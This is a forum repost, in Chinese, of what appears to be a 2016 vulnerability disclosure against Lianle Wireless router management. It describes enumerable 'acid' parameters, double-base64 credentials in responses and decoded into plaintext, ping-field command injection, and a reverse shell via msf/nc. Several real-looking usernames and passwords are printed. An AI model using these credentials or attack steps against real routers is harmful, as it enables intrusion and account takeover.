HanDs
管理员

[7月漏洞公开] WIFI安全之连乐无线某处缺陷可导致所有路由设备明文密码泄漏及命令执行漏洞(可shell所有商家路由器) 



WIFI安全之连乐无线某处缺陷可导致所有路由设备明文密码泄漏及命令执行漏洞(可shell所有商家路由器)
官方服务器也沦陷

作为国内领先的互联网内容分发渠道和媒体平台运营商,湖北盛天网络技术股份有限公司致力于为网吧、酒店、咖啡厅、车站、机场等公众互联网上网场所提供完善的移动网络、系统安全与数字内容管理产品及服务,同时为在这些场所上网的网民提供丰富、安全、有趣的互联网内容与体验。目前,盛天旗下各平台与产品每天覆盖超过2500万网民,随着业务的扩展,这一数字正在快速增长之中。

详细说明:

http://**.**.**.**/ zhangli zhangli123



此处存在越权 acid可以遍历

http://**.**.**.**/Machine/remote/?acid=361525

http://**.**.**.**/Machine/remote/?acid=361536

http://**.**.**.**/Machine/remote/?acid=361559

http://**.**.**.**/Machine/remote/?acid=361562

http://**.**.**.**/Machine/remote/?acid=361565

http://**.**.**.**/Machine/remote/?acid=361573



返回包中的链接:

http://**.**.**.**:10038/severlogin.html#wwwuser/user=TWpFd016SXpNVEF3TURBd01EYz0=&wwwuser/password=WVRJeE1ETXlNekV3TURBd01EQTM=



http://**.**.**.**:10000/severlogin.html#wwwuser/user=ZEdsaGJuUnBZVzVvWVc1NmFHVnVadz09&wwwuser/password=ZEdsaGJuUnBZVzVvWVc1NmFHVnVaelkyT0E9PQ==



base64解密两次获得明文密码:

user:21032310000007 password:a21032310000007



user:tiantianhanzheng password:tiantianhanzheng668

漏洞证明:

屏幕快照 2016-04-11 下午7.22.57.png



屏幕快照 2016-04-11 下午7.31.32.png



屏幕快照 2016-04-11 下午7.33.10.png



屏幕快照 2016-04-11 下午7.41.35.png





网络检测 ping功能存在命令执行漏洞

屏幕快照 2016-04-11 下午7.42.26.png



屏幕快照 2016-04-11 下午7.46.16.png



屏幕快照 2016-04-11 下午7.50.09.png





测试不知道为什么 web提交nc反弹一直不成功



最后用msf成功反弹shell

再执行nc命令发现居然正常,怪哉...

测试了一下发现保存为sh文件执行也无法反弹

屏幕快照 2016-04-11 下午7.52.25.png



屏幕快照 2016-04-11 下午7.52.33.png



屏幕快照 2016-04-11 下午7.53.05.png





路由器上发现一个key 可以利用登陆lianle官方某服务器

/etc/dropbear_rsa_host_key

%7_A`1`{N_}0WEN`0}PN)XA.jpg

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
WIFI 安全之连乐无线某处缺陷可导致所有路由设备明文密码泄漏及命令执行漏洞 shell 所有商家路由器
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复